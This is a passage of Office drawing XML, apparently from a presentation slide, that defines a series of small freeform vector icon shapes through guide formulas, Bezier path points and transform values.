                  <a:gd name="T1" fmla="*/ 371 h 371"/>
                  <a:gd name="T2" fmla="*/ 75 w 420"/>
                  <a:gd name="T3" fmla="*/ 368 h 371"/>
                  <a:gd name="T4" fmla="*/ 17 w 420"/>
                  <a:gd name="T5" fmla="*/ 338 h 371"/>
                  <a:gd name="T6" fmla="*/ 6 w 420"/>
                  <a:gd name="T7" fmla="*/ 303 h 371"/>
                  <a:gd name="T8" fmla="*/ 41 w 420"/>
                  <a:gd name="T9" fmla="*/ 292 h 371"/>
                  <a:gd name="T10" fmla="*/ 87 w 420"/>
                  <a:gd name="T11" fmla="*/ 316 h 371"/>
                  <a:gd name="T12" fmla="*/ 336 w 420"/>
                  <a:gd name="T13" fmla="*/ 192 h 371"/>
                  <a:gd name="T14" fmla="*/ 54 w 420"/>
                  <a:gd name="T15" fmla="*/ 52 h 371"/>
                  <a:gd name="T16" fmla="*/ 42 w 420"/>
                  <a:gd name="T17" fmla="*/ 18 h 371"/>
                  <a:gd name="T18" fmla="*/ 77 w 420"/>
                  <a:gd name="T19" fmla="*/ 6 h 371"/>
                  <a:gd name="T20" fmla="*/ 406 w 420"/>
                  <a:gd name="T21" fmla="*/ 169 h 371"/>
                  <a:gd name="T22" fmla="*/ 420 w 420"/>
                  <a:gd name="T23" fmla="*/ 192 h 371"/>
                  <a:gd name="T24" fmla="*/ 406 w 420"/>
                  <a:gd name="T25" fmla="*/ 216 h 371"/>
                  <a:gd name="T26" fmla="*/ 98 w 420"/>
                  <a:gd name="T27" fmla="*/ 368 h 371"/>
                  <a:gd name="T28" fmla="*/ 87 w 420"/>
                  <a:gd name="T2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0" h="371">
                    <a:moveTo>
                      <a:pt x="87" y="371"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="371"/>
                      <a:pt x="79" y="370"/>
                      <a:pt x="75" y="368"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="338"/>
                      <a:pt x="17" y="338"/>
                      <a:pt x="17" y="338"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="331"/>
                      <a:pt x="0" y="316"/>
                      <a:pt x="6" y="303"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="290"/>
                      <a:pt x="29" y="285"/>
                      <a:pt x="41" y="292"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="316"/>
                      <a:pt x="87" y="316"/>
                      <a:pt x="87" y="316"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="336" y="192"/>
                      <a:pt x="336" y="192"/>
                      <a:pt x="336" y="19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41" y="46"/>
                      <a:pt x="36" y="31"/>
                      <a:pt x="42" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="5"/>
                      <a:pt x="64" y="0"/>
                      <a:pt x="77" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="406" y="169"/>
                      <a:pt x="406" y="169"/>
                      <a:pt x="406" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="415" y="174"/>
                      <a:pt x="420" y="183"/>
                      <a:pt x="420" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="420" y="202"/>
                      <a:pt x="415" y="211"/>
                      <a:pt x="406" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="368"/>
                      <a:pt x="98" y="368"/>
                      <a:pt x="98" y="368"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="370"/>
                      <a:pt x="91" y="371"/>
                      <a:pt x="87" y="3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1790" tIns="20895" rIns="41790" bIns="208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962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34" name="Freeform 773">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE70FFB0-FD97-6746-867B-9DC0D6B2C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302" y="5768272"/>
                <a:ext cx="12364" cy="107465"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 52"/>
                  <a:gd name="T1" fmla="*/ 450 h 450"/>
                  <a:gd name="T2" fmla="*/ 0 w 52"/>
                  <a:gd name="T3" fmla="*/ 424 h 450"/>
                  <a:gd name="T4" fmla="*/ 0 w 52"/>
                  <a:gd name="T5" fmla="*/ 26 h 450"/>
                  <a:gd name="T6" fmla="*/ 26 w 52"/>
                  <a:gd name="T7" fmla="*/ 0 h 450"/>
                  <a:gd name="T8" fmla="*/ 52 w 52"/>
                  <a:gd name="T9" fmla="*/ 26 h 450"/>
                  <a:gd name="T10" fmla="*/ 52 w 52"/>
                  <a:gd name="T11" fmla="*/ 424 h 450"/>
                  <a:gd name="T12" fmla="*/ 26 w 52"/>
                  <a:gd name="T13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450">
                    <a:moveTo>
                      <a:pt x="26" y="450"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="450"/>
                      <a:pt x="0" y="439"/>
                      <a:pt x="0" y="42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40" y="0"/>
                      <a:pt x="52" y="12"/>
                      <a:pt x="52" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="424"/>
                      <a:pt x="52" y="424"/>
                      <a:pt x="52" y="424"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="439"/>
                      <a:pt x="40" y="450"/>
                      <a:pt x="26" y="4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1790" tIns="20895" rIns="41790" bIns="208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962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35" name="Freeform 774">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52EDD687-C74C-B549-A65B-BB3849871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805" y="5646542"/>
                <a:ext cx="43747" cy="42796"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 185"/>
                  <a:gd name="T1" fmla="*/ 183 h 183"/>
                  <a:gd name="T2" fmla="*/ 10 w 185"/>
                  <a:gd name="T3" fmla="*/ 175 h 183"/>
                  <a:gd name="T4" fmla="*/ 10 w 185"/>
                  <a:gd name="T5" fmla="*/ 139 h 183"/>
                  <a:gd name="T6" fmla="*/ 139 w 185"/>
                  <a:gd name="T7" fmla="*/ 10 h 183"/>
                  <a:gd name="T8" fmla="*/ 175 w 185"/>
                  <a:gd name="T9" fmla="*/ 10 h 183"/>
                  <a:gd name="T10" fmla="*/ 175 w 185"/>
                  <a:gd name="T11" fmla="*/ 47 h 183"/>
                  <a:gd name="T12" fmla="*/ 47 w 185"/>
                  <a:gd name="T13" fmla="*/ 175 h 183"/>
                  <a:gd name="T14" fmla="*/ 28 w 185"/>
                  <a:gd name="T15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5" h="183">
                    <a:moveTo>
                      <a:pt x="28" y="183"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="183"/>
                      <a:pt x="15" y="180"/>
                      <a:pt x="10" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="165"/>
                      <a:pt x="0" y="149"/>
                      <a:pt x="10" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="10"/>
                      <a:pt x="139" y="10"/>
                      <a:pt x="139" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="0"/>
                      <a:pt x="165" y="0"/>
                      <a:pt x="175" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="185" y="20"/>
                      <a:pt x="185" y="37"/>
                      <a:pt x="175" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="175"/>
                      <a:pt x="47" y="175"/>
                      <a:pt x="47" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="180"/>
                      <a:pt x="35" y="183"/>
                      <a:pt x="28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1790" tIns="20895" rIns="41790" bIns="208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962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36" name="Freeform 775">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCB4AA54-9978-7A45-9165-312B98F34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620" y="5781586"/>
                <a:ext cx="56110" cy="12364"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 210 w 236"/>
                  <a:gd name="T1" fmla="*/ 51 h 51"/>
                  <a:gd name="T2" fmla="*/ 26 w 236"/>
                  <a:gd name="T3" fmla="*/ 51 h 51"/>
                  <a:gd name="T4" fmla="*/ 0 w 236"/>
                  <a:gd name="T5" fmla="*/ 26 h 51"/>
                  <a:gd name="T6" fmla="*/ 26 w 236"/>
                  <a:gd name="T7" fmla="*/ 0 h 51"/>
                  <a:gd name="T8" fmla="*/ 210 w 236"/>
                  <a:gd name="T9" fmla="*/ 0 h 51"/>
                  <a:gd name="T10" fmla="*/ 236 w 236"/>
                  <a:gd name="T11" fmla="*/ 26 h 51"/>
                  <a:gd name="T12" fmla="*/ 210 w 236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51">
                    <a:moveTo>
                      <a:pt x="210" y="51"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="51"/>
                      <a:pt x="26" y="51"/>
                      <a:pt x="26" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="51"/>
                      <a:pt x="0" y="40"/>
                      <a:pt x="0" y="26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210" y="0"/>
                      <a:pt x="210" y="0"/>
                      <a:pt x="210" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="224" y="0"/>
                      <a:pt x="236" y="11"/>
                      <a:pt x="236" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="236" y="40"/>
                      <a:pt x="224" y="51"/>
                      <a:pt x="21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1790" tIns="20895" rIns="41790" bIns="208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962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37" name="Freeform 776">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B808CD-4DD9-0C4F-B376-E1052BE9A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996" y="5646542"/>
                <a:ext cx="43747" cy="42796"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 157 w 185"/>
                  <a:gd name="T1" fmla="*/ 183 h 183"/>
                  <a:gd name="T2" fmla="*/ 138 w 185"/>
                  <a:gd name="T3" fmla="*/ 175 h 183"/>
                  <a:gd name="T4" fmla="*/ 10 w 185"/>
                  <a:gd name="T5" fmla="*/ 47 h 183"/>
                  <a:gd name="T6" fmla="*/ 10 w 185"/>
                  <a:gd name="T7" fmla="*/ 10 h 183"/>
                  <a:gd name="T8" fmla="*/ 46 w 185"/>
                  <a:gd name="T9" fmla="*/ 10 h 183"/>
                  <a:gd name="T10" fmla="*/ 175 w 185"/>
                  <a:gd name="T11" fmla="*/ 139 h 183"/>
                  <a:gd name="T12" fmla="*/ 175 w 185"/>
                  <a:gd name="T13" fmla="*/ 175 h 183"/>
                  <a:gd name="T14" fmla="*/ 157 w 185"/>
                  <a:gd name="T15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5" h="183">
                    <a:moveTo>
                      <a:pt x="157" y="183"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="183"/>
                      <a:pt x="143" y="180"/>
                      <a:pt x="138" y="175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0" y="37"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="10" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="0"/>
                      <a:pt x="36" y="0"/>
                      <a:pt x="46" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="139"/>
                      <a:pt x="175" y="139"/>
                      <a:pt x="175" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="185" y="149"/>
                      <a:pt x="185" y="165"/>
                      <a:pt x="175" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="180"/>
                      <a:pt x="163" y="183"/>
                      <a:pt x="157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1790" tIns="20895" rIns="41790" bIns="208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962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38" name="Freeform 777">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF212D0-A021-1942-B913-A29FDDC0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1506" y="5737839"/>
                <a:ext cx="12364" cy="39943"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 52"/>
                  <a:gd name="T1" fmla="*/ 169 h 169"/>
                  <a:gd name="T2" fmla="*/ 1 w 52"/>
                  <a:gd name="T3" fmla="*/ 143 h 169"/>
                  <a:gd name="T4" fmla="*/ 0 w 52"/>
                  <a:gd name="T5" fmla="*/ 26 h 169"/>
                  <a:gd name="T6" fmla="*/ 26 w 52"/>
                  <a:gd name="T7" fmla="*/ 0 h 169"/>
                  <a:gd name="T8" fmla="*/ 26 w 52"/>
                  <a:gd name="T9" fmla="*/ 0 h 169"/>
                  <a:gd name="T10" fmla="*/ 52 w 52"/>
                  <a:gd name="T11" fmla="*/ 26 h 169"/>
                  <a:gd name="T12" fmla="*/ 52 w 52"/>
                  <a:gd name="T13" fmla="*/ 143 h 169"/>
                  <a:gd name="T14" fmla="*/ 27 w 52"/>
                  <a:gd name="T15" fmla="*/ 169 h 169"/>
                  <a:gd name="T16" fmla="*/ 26 w 52"/>
                  <a:gd name="T17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169">
                    <a:moveTo>
                      <a:pt x="26" y="169"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="169"/>
                      <a:pt x="1" y="158"/>
                      <a:pt x="1" y="14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ubicBezTo>
                      <a:pt x="52" y="143"/>
                      <a:pt x="52" y="143"/>
                      <a:pt x="52" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="158"/>
                      <a:pt x="41" y="169"/>
                      <a:pt x="27" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="169"/>
                      <a:pt x="26" y="169"/>
                      <a:pt x="26" y="1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1790" tIns="20895" rIns="41790" bIns="208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962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39" name="Freeform 778">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F4989E8-23BF-B849-8E96-958220861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0008" y="5696945"/>
                <a:ext cx="36139" cy="23776"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 155"/>
                  <a:gd name="T1" fmla="*/ 100 h 100"/>
                  <a:gd name="T2" fmla="*/ 6 w 155"/>
                  <a:gd name="T3" fmla="*/ 86 h 100"/>
                  <a:gd name="T4" fmla="*/ 18 w 155"/>
                  <a:gd name="T5" fmla="*/ 51 h 100"/>
                  <a:gd name="T6" fmla="*/ 114 w 155"/>
                  <a:gd name="T7" fmla="*/ 6 h 100"/>
                  <a:gd name="T8" fmla="*/ 149 w 155"/>
                  <a:gd name="T9" fmla="*/ 18 h 100"/>
                  <a:gd name="T10" fmla="*/ 137 w 155"/>
                  <a:gd name="T11" fmla="*/ 52 h 100"/>
                  <a:gd name="T12" fmla="*/ 40 w 155"/>
                  <a:gd name="T13" fmla="*/ 98 h 100"/>
                  <a:gd name="T14" fmla="*/ 29 w 155"/>
                  <a:gd name="T15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0">
                    <a:moveTo>
                      <a:pt x="29" y="100"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="100"/>
                      <a:pt x="10" y="95"/>
                      <a:pt x="6" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="73"/>
                      <a:pt x="5" y="57"/>
                      <a:pt x="18" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="6"/>
                      <a:pt x="114" y="6"/>
                      <a:pt x="114" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="0"/>
                      <a:pt x="143" y="5"/>
                      <a:pt x="149" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="31"/>
                      <a:pt x="149" y="46"/>
                      <a:pt x="137" y="52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37" y="100"/>
                      <a:pt x="33" y="100"/>
                      <a:pt x="2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1790" tIns="20895" rIns="41790" bIns="208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962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40" name="Freeform 779">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60F08C38-B143-DD46-8B18-978FBA639A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832" y="5776831"/>
                <a:ext cx="12364" cy="33286"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 52"/>
                  <a:gd name="T1" fmla="*/ 140 h 140"/>
                  <a:gd name="T2" fmla="*/ 0 w 52"/>
                  <a:gd name="T3" fmla="*/ 114 h 140"/>
                  <a:gd name="T4" fmla="*/ 0 w 52"/>
                  <a:gd name="T5" fmla="*/ 25 h 140"/>
                  <a:gd name="T6" fmla="*/ 26 w 52"/>
                  <a:gd name="T7" fmla="*/ 0 h 140"/>
                  <a:gd name="T8" fmla="*/ 52 w 52"/>
                  <a:gd name="T9" fmla="*/ 25 h 140"/>
                  <a:gd name="T10" fmla="*/ 52 w 52"/>
                  <a:gd name="T11" fmla="*/ 114 h 140"/>
                  <a:gd name="T12" fmla="*/ 26 w 52"/>
                  <a:gd name="T13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40">
                    <a:moveTo>
                      <a:pt x="26" y="140"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="140"/>
                      <a:pt x="0" y="128"/>
                      <a:pt x="0" y="11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40" y="0"/>
                      <a:pt x="52" y="11"/>
                      <a:pt x="52" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="114"/>
                      <a:pt x="52" y="114"/>
                      <a:pt x="52" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="128"/>
                      <a:pt x="40" y="140"/>
                      <a:pt x="26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1790" tIns="20895" rIns="41790" bIns="208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962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41" name="Freeform 780">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{596295BC-96A8-CA4A-9D16-7CAC358EB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187" y="5719770"/>
                <a:ext cx="35188" cy="35188"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 40 w 150"/>
                  <a:gd name="T1" fmla="*/ 146 h 146"/>
                  <a:gd name="T2" fmla="*/ 17 w 150"/>
                  <a:gd name="T3" fmla="*/ 133 h 146"/>
                  <a:gd name="T4" fmla="*/ 28 w 150"/>
                  <a:gd name="T5" fmla="*/ 98 h 146"/>
                  <a:gd name="T6" fmla="*/ 66 w 150"/>
                  <a:gd name="T7" fmla="*/ 76 h 146"/>
                  <a:gd name="T8" fmla="*/ 18 w 150"/>
                  <a:gd name="T9" fmla="*/ 53 h 146"/>
                  <a:gd name="T10" fmla="*/ 6 w 150"/>
                  <a:gd name="T11" fmla="*/ 19 h 146"/>
                  <a:gd name="T12" fmla="*/ 40 w 150"/>
                  <a:gd name="T13" fmla="*/ 7 h 146"/>
                  <a:gd name="T14" fmla="*/ 135 w 150"/>
                  <a:gd name="T15" fmla="*/ 51 h 146"/>
                  <a:gd name="T16" fmla="*/ 149 w 150"/>
                  <a:gd name="T17" fmla="*/ 74 h 146"/>
                  <a:gd name="T18" fmla="*/ 136 w 150"/>
                  <a:gd name="T19" fmla="*/ 98 h 146"/>
                  <a:gd name="T20" fmla="*/ 52 w 150"/>
                  <a:gd name="T21" fmla="*/ 143 h 146"/>
                  <a:gd name="T22" fmla="*/ 40 w 150"/>
                  <a:gd name="T23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0" h="146">
                    <a:moveTo>
                      <a:pt x="40" y="146"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="146"/>
                      <a:pt x="22" y="141"/>
                      <a:pt x="17" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="120"/>
                      <a:pt x="15" y="105"/>
                      <a:pt x="28" y="98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5" y="47"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="6" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="6"/>
                      <a:pt x="27" y="0"/>
                      <a:pt x="40" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="135" y="51"/>
                      <a:pt x="135" y="51"/>
                      <a:pt x="135" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="56"/>
                      <a:pt x="149" y="64"/>
                      <a:pt x="149" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="84"/>
                      <a:pt x="144" y="93"/>
                      <a:pt x="136" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="143"/>
                      <a:pt x="52" y="143"/>
                      <a:pt x="52" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="145"/>
                      <a:pt x="44" y="146"/>
                      <a:pt x="40" y="1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1790" tIns="20895" rIns="41790" bIns="208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962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42" name="Freeform 781">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{413163FE-DD84-784B-AC8C-F9584C4DB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746" y="5800606"/>
                <a:ext cx="27580" cy="42796"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 117"/>
                  <a:gd name="T1" fmla="*/ 183 h 183"/>
                  <a:gd name="T2" fmla="*/ 7 w 117"/>
                  <a:gd name="T3" fmla="*/ 171 h 183"/>
                  <a:gd name="T4" fmla="*/ 15 w 117"/>
                  <a:gd name="T5" fmla="*/ 135 h 183"/>
                  <a:gd name="T6" fmla="*/ 66 w 117"/>
                  <a:gd name="T7" fmla="*/ 103 h 183"/>
                  <a:gd name="T8" fmla="*/ 66 w 117"/>
                  <a:gd name="T9" fmla="*/ 25 h 183"/>
                  <a:gd name="T10" fmla="*/ 91 w 117"/>
                  <a:gd name="T11" fmla="*/ 0 h 183"/>
                  <a:gd name="T12" fmla="*/ 117 w 117"/>
                  <a:gd name="T13" fmla="*/ 25 h 183"/>
                  <a:gd name="T14" fmla="*/ 117 w 117"/>
                  <a:gd name="T15" fmla="*/ 117 h 183"/>
                  <a:gd name="T16" fmla="*/ 106 w 117"/>
                  <a:gd name="T17" fmla="*/ 138 h 183"/>
                  <a:gd name="T18" fmla="*/ 43 w 117"/>
                  <a:gd name="T19" fmla="*/ 179 h 183"/>
                  <a:gd name="T20" fmla="*/ 29 w 117"/>
                  <a:gd name="T21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183">
                    <a:moveTo>
                      <a:pt x="29" y="183"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="183"/>
                      <a:pt x="12" y="179"/>
                      <a:pt x="7" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="159"/>
                      <a:pt x="3" y="143"/>
                      <a:pt x="15" y="135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6" y="11"/>
                      <a:pt x="77" y="0"/>
                      <a:pt x="91" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="0"/>
                      <a:pt x="117" y="11"/>
                      <a:pt x="117" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="117"/>
                      <a:pt x="117" y="117"/>
                      <a:pt x="117" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="125"/>
                      <a:pt x="113" y="134"/>
                      <a:pt x="106" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="179"/>
                      <a:pt x="43" y="179"/>
                      <a:pt x="43" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="182"/>
                      <a:pt x="34" y="183"/>
                      <a:pt x="29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1790" tIns="20895" rIns="41790" bIns="208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962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43" name="Freeform 782">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C06C837-EC50-6349-88ED-171C22EC3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962" y="5734986"/>
                <a:ext cx="12364" cy="41845"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 51"/>
                  <a:gd name="T1" fmla="*/ 178 h 178"/>
                  <a:gd name="T2" fmla="*/ 0 w 51"/>
                  <a:gd name="T3" fmla="*/ 152 h 178"/>
                  <a:gd name="T4" fmla="*/ 0 w 51"/>
                  <a:gd name="T5" fmla="*/ 26 h 178"/>
                  <a:gd name="T6" fmla="*/ 25 w 51"/>
                  <a:gd name="T7" fmla="*/ 0 h 178"/>
                  <a:gd name="T8" fmla="*/ 51 w 51"/>
                  <a:gd name="T9" fmla="*/ 26 h 178"/>
                  <a:gd name="T10" fmla="*/ 51 w 51"/>
                  <a:gd name="T11" fmla="*/ 152 h 178"/>
                  <a:gd name="T12" fmla="*/ 25 w 51"/>
                  <a:gd name="T13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78">
                    <a:moveTo>
                      <a:pt x="25" y="178"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="178"/>
                      <a:pt x="0" y="166"/>
                      <a:pt x="0" y="15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5" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="0"/>
                      <a:pt x="51" y="12"/>
                      <a:pt x="51" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="152"/>
                      <a:pt x="51" y="152"/>
                      <a:pt x="51" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="166"/>
                      <a:pt x="40" y="178"/>
                      <a:pt x="25" y="1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1790" tIns="20895" rIns="41790" bIns="208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962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44" name="Freeform 783">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB67D342-DB2D-1C4B-AE96-3646A7162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734" y="5696945"/>
                <a:ext cx="36139" cy="21874"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 121 w 150"/>
                  <a:gd name="T1" fmla="*/ 93 h 93"/>
                  <a:gd name="T2" fmla="*/ 111 w 150"/>
                  <a:gd name="T3" fmla="*/ 91 h 93"/>
                  <a:gd name="T4" fmla="*/ 19 w 150"/>
                  <a:gd name="T5" fmla="*/ 53 h 93"/>
                  <a:gd name="T6" fmla="*/ 6 w 150"/>
                  <a:gd name="T7" fmla="*/ 19 h 93"/>
                  <a:gd name="T8" fmla="*/ 39 w 150"/>
                  <a:gd name="T9" fmla="*/ 5 h 93"/>
                  <a:gd name="T10" fmla="*/ 131 w 150"/>
                  <a:gd name="T11" fmla="*/ 44 h 93"/>
                  <a:gd name="T12" fmla="*/ 145 w 150"/>
                  <a:gd name="T13" fmla="*/ 78 h 93"/>
                  <a:gd name="T14" fmla="*/ 121 w 150"/>
                  <a:gd name="T15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93">
                    <a:moveTo>
                      <a:pt x="121" y="93"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="93"/>
                      <a:pt x="114" y="93"/>
                      <a:pt x="111" y="91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6" y="47"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="6" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="6"/>
                      <a:pt x="26" y="0"/>
                      <a:pt x="39" y="5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44" y="49"/>
                      <a:pt x="150" y="64"/>
                      <a:pt x="145" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="87"/>
                      <a:pt x="131" y="93"/>
                      <a:pt x="121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1790" tIns="20895" rIns="41790" bIns="208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962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49" name="Freeform 784">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27DC0C8A-47E5-B847-B945-6EB9FFB8D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457" y="5722623"/>
                <a:ext cx="39943" cy="38992"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 139 w 168"/>
                  <a:gd name="T1" fmla="*/ 164 h 164"/>
                  <a:gd name="T2" fmla="*/ 127 w 168"/>
                  <a:gd name="T3" fmla="*/ 161 h 164"/>
                  <a:gd name="T4" fmla="*/ 14 w 168"/>
                  <a:gd name="T5" fmla="*/ 103 h 164"/>
                  <a:gd name="T6" fmla="*/ 0 w 168"/>
                  <a:gd name="T7" fmla="*/ 80 h 164"/>
